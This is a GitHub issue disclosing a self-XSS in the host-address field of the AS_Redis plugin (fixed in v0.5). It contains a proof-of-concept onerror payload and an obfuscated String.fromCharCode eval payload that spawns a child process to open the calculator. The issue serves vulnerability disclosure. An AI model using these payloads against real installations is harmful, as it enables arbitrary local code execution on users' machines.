Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

v0.4 Self-XSS in host addr #1

Closed
Medicean opened this issue Oct 20, 2021 · 0 comments
Closed

v0.4 Self-XSS in host addr #1

Medicean opened this issue Oct 20, 2021 · 0 comments
Labels

Comments

@Medicean
Copy link

Medicean commented Oct 20, 2021

Discoverer: cc7v@校长

Affected

AS_Redis Plugin version <= v0.4

Fixed

AS_Redis Plugin version >= v0.5

PoC

<img src=1 onerror=alert(1)>

image

Exploit

Lead to Local Code Execution

<img src=1 onerror="eval(String.fromCharCode(114,101,113,117,105,114,101,40,39,99,104,105,1 08,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,97,108,99, 46,101,120,101,39,41))">

image

Reference

https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

1 participant